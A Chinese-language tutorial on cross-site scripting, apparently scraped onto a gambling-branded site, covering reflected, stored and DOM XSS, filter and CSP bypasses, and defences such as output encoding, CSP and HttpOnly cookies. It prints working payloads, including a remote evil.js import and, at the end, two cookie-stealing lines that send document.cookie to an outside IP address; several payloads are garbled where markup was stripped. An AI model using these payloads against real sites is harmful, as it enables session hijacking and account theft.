XSS漏洞的原理&利用&防御 - 365现金球网-365提款限制-365体育手机版中国官方网站

一、前言

XSS 的本质是一种高级钓鱼手法。

二、什么是 XSS

XSS (Cross Site Scripting) 攻击全称跨站脚本攻击，是为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆，故将跨站脚本攻击缩写为 XSS。

XSS 是一种经常出现在 Web 应用中的计算机安全漏洞，它允许恶意 Web 用户将代码植入到提供给其它用户使用的页面中。

XSS 的运行原理是将恶意的 script 脚本插入进 html/css/js 文件当中。代码长这样：

三、XSS 的危害

前文我们说 XSS 本质上来说是一种钓鱼攻击，所以 XSS 的危害角度上也是以钓鱼能够造成的危害为主。

四、XSS 简单应用场景举例

这里先介绍 XSS 的应用方法，如此一来讲起来不会太空洞，也能与下面的攻击手段有所呼应。以反射型 XSS 为例，原理图如下。

这里借用国光师傅的图片进行分析

这是一个恶意的 QQ 空间钓鱼网站，在输入框内输入username%20，再对登陆的按钮设置一个 href 到真正的 QQ 空间官网。然而当时用户输入的用户名密码已经被攻击者窃取了。

五、XSS 基本攻击手段

XSS 根据效果不同主要分为三种类型

反射型 XSS，存储型 XSS，DOM 型 XSS

危害性来说，存储型 XSS >> 反射型 XSS ~= DOM 型 XSS

我们接下来细讲一下这三种 XSS 的攻击手段。

（一）反射型 XSS 及绕过手段

什么是反射型 XSS

反射型 XSS，也叫非持久型 XSS，转瞬即逝。

利用比较简单，比如在搜索框中，我记得当时 2020 年，b 站的搜索框还是存在 XSS 的，现在没有了。

反射型 XSS 的 Payload 如下：

效果如图所示：

绕过

当大多数标签被禁止时的绕过

Lab: Reflected XSS into HTML context with most tags and attributes blocked

还是常规的 Fuzz 测试，在尝试 XSS 攻击之后，若失败了就进行 Fuzz 测试，因为无法排除是不是 WAF 过滤了部分关键字。

探测出来 onresize 标签还是有效的，我们可以通过这一串 Payload 唤起打印服务：

" onload=this.style.width='100px'>

当事件处理器与 href 被禁用时的绕过

老样子还是需要 Fuzz 的。如果渗透测试真正遇到这种情况的话，svg标签的绕过方式还是主流。

Lab: Reflected XSS with event handlers and href attributes blocked

Payload：

values=javascript:alert(1) />

Click me

还有一些svg标签的绕过手段：

对 script 进行闭合后构造 Payload

对某些语句中的符号进行闭合。

有些 Web 后端代码会通过反斜杠转义，对很多单引号字符进行过滤，那么转义之后的代码就不能进行原 Payload 的作用。

XSS Insert Into-> JavaScript

这种 Payload 可以是通过修改 Web 网站内部 JavaScript 来实现的，因为 JavaScript 本身就可以直接执行 alert 方法，无需使用&token=;script-src-elem 'unsafe-inline'

使用script-src-elem对 CSP 进行覆盖，从而进行 XSS 攻击。

（二）存储型 XSS

存储型 XSS 是危害性最大的 XSS 了，它一般出现于评论留言功能处，大致的利用方法与绕过手段与反射型 XSS 很像，原理图如下。

如果执行起来也是插入进上下文标签当中，和之前反射型 XSS 的代码图类似，都是没有加任何的过滤手段，如图。

在新增的评论中将 username 构造成 Payload：

username=

而这一条评论，又会被保存到数组或者是数据库当中(这个看 Web 程序的设计)，就造成了存储型 XSS。

绕过手段不再逼逼，和反射型 XSS 是异曲同工。

DOM 型 XSS

DOM 型的 XSS 是基于文档对象模型 Document Objeet Model，DOM)的一种漏洞。说白了就是那些标签，比如img，input等这种类型的 DOM 节点标签而已，而 DOM 型 XSS 打的就是这些。

注：DOM 型 XSS 与反射型，存储型 XSS 有很大的区别，比如dom型是在浏览器的前端产生的漏洞，没有数据发到服务器，而其他两个都要发送数据到服务器。

一些常用的标签与属性：

注：下面列举的标签大部分是可以自动触发 js 代码的，无需用户去交互，大部分情况下希望是自动触发而不是等用户去触发。

标签

说明

Payload

scirpt

img

标签定义 HTML 页面中的图像。

input

标签规定了用户可以在其中输入数据的输入字段。

说明

Payload

onfocus 事件在对象获得焦点时发生

竞争焦点，从而触发 onblur 事件

input 标签的 autofocus 属性规定当页面加载时元素应该自动获得焦点。可以通过 autofocus 属性自动执行本身的 focus 事件，这个向量是使焦点自动跳到输入元素上，触发焦点事件，无需用户去触发

details

标签通过提供用户开启关闭的交互式控件，规定了用户可见的或者隐藏的需求的补充细节。

说明

Payload

ontoggle 事件规定了在用户打开或关闭

元素时触发

使用details 标签的 open 属性触发ontoggle事件，无需用户去点击即可触发

svg

select

说明

Payload

通过autofocus属性规定当页面加载时元素应该自动获得焦点，这个向量是使焦点自动跳到输入元素上，触发焦点事件，无需用户去触发

textarea

标签定义一个多行的文本输入控件</p> <p><textarea onfocus=alert(1); autofocus></p> <p>keygen</p> <p>-</p> <p><keygen autofocus onfocus=alert(1)> //仅限火狐</p> <p>marquee</p> <p>-</p> <p><marquee onstart=alert(1)></marquee> //Chrome不行，火狐和IE都可以</p> <p>isindex</p> <p><link>标签定义文档与外部资源的关系。在无 CSP 的情况下才可以使用</p> <p><link rel=import href="http://47.xxx.xxx.72/evil.js"></p> <p>DOM 型 XSS 的利用</p> <p>(1) jQuery 中的 DOM 型 XSS</p> <p>有问题的代码如下图所示</p> <p>若为进行任意过滤的时候 Payload：<img src=1 onerror=alert(1)></p> <p>(2) 利用遗留下的测试代码</p> <p>详见WebGoat代码审计-07-XSS 利用测试代码触发 DOM 型 XSS)</p> <p>六、CSRF 和 XSS 的区别</p> <p>1、CSRF是跨站请求伪造; XSS是跨域脚本攻击。</p> <p>2、CSRF需要用户先登录网站A,获取cookie; XSS不需要登录。</p> <p>3、CSRF是利用网站A本身的漏洞,去请求网站A的api; XSS是向网站A注入JS代码,然后执行JS里的代码,篡改网站A的内容。（XSS利用的是站点内的信任用户，而CSRF则是通过伪装来自受信任用户的请求来利用受信任的网站。你可以这么理解CSRF攻击：攻击者盗用了你的身份，以你的名义向第三方网站发送恶意请求。）</p> <p>七、XSS 的防御</p> <p>1.对输出端的数据进行编码</p> <p>2.验证输入</p> <p>对输出端的数据进行编码</p> <p>将一些字符进行转义，例如<，>进行转义</p> <p>白名单，通过一些标签限制</p> <p>不要把后端传进来的数据直接作为 HTML 渲染，进行处理</p> <p>CSP 的应用</p> <p>严格的 CSP 在 XSS 的防范中可以起到以下的作用：</p> <p>禁止加载外域代码，防止复杂的攻击逻辑。</p> <p>禁止内联脚本执行。</p> <p>禁止外域提交，网站被攻击后，用户的数据不会泄露到外域。</p> <p>合理使用上报可以及时发现 XSS，利于尽快修复问题。</p> <p>其他安全措施</p> <p>HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此 Cookie。</p> <p>验证码：防止脚本冒充用户提交危险操作。</p> <p>常用payload</p> <p>将受害者的cookie发送到攻击者服务器</p> <p><img src=1 onerror="setInterval(() => {fetch('http://10.13.82.5:8088?cookie=' + document.cookie, {method: 'GET'});}, 6000);"></p> <p><script>var i=new Image();i.src="http://10.13.82.5:8088?cookie=" + btoa(document.cookie);</script></p> </div> <div class="article-navigation"> <a href="/a68e5dc3910fa7a0/54b26e9a7a199453.html" class="nav-previous">← Find More Calculator☟</a> <a href="/ceb8a9e31f670443/14588a2967c68fd8.html" class="nav-next">魔物獵人荒野 →</a> </div> </article> <section class="related-articles"> <h2>🌠 相关推荐</h2> <div class="article-grid"> <article class="article-card"> <img src="/0.jpg" alt="乐刷是什么？一文了解聚合支付的未来趋势" class="card-image"> <h2 class="card-title"><a href="/ceb8a9e31f670443/61da23c8691f9847.html">乐刷是什么？一文了解聚合支付的未来趋势</a></h2> <div class="card-meta"> <span>📅 09-06</span> <span>👁️ 4141</span> </div> </article> <article class="article-card"> <img src="/0.jpg" alt="皇上的姐姐怎么称呼" class="card-image"> <h2 class="card-title"><a href="/c70a3b958ec7e2eb/3116ad92eddb2727.html">皇上的姐姐怎么称呼</a></h2> <div class="card-meta"> <span>📅 06-30</span> <span>👁️ 1151</span> </div> </article> <article class="article-card"> <img src="/0.jpg" alt="北京车牌靓号中你见过最牛的车牌号是什么?--车贝管家" class="card-image"> <h2 class="card-title"><a href="/a68e5dc3910fa7a0/7f3964a27d3e9197.html">北京车牌靓号中你见过最牛的车牌号是什么?--车贝管家</a></h2> <div class="card-meta"> <span>📅 11-13</span> <span>👁️ 8800</span> </div> </article> <article class="article-card"> <img src="/0.jpg" alt="容纳的意思" class="card-image"> <h2 class="card-title"><a href="/c70a3b958ec7e2eb/16a2918a526abcae.html">容纳的意思</a></h2> <div class="card-meta"> <span>📅 07-26</span> <span>👁️ 6567</span> </div> </article> </div> </section> </main> <aside class="sidebar"> <div class="widget"> <h3>🔭 探索频道</h3> <div class="tag-cloud"> </div> </div> <div class="widget"> <h3>🌌 星际访客</h3> <script> var _mtj = _mtj || []; (function () { var mtj = document.createElement("script"); mtj.src = "https://node90.aizhantj.com:21233/tjjs/?k=1tjqoiqkcfv"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(mtj, s); })(); </script> </div> </aside> </div> <script type='text/javascript' src='/api.js'></script> <script type='text/javascript' src='/tongji.js'></script> </body> </html>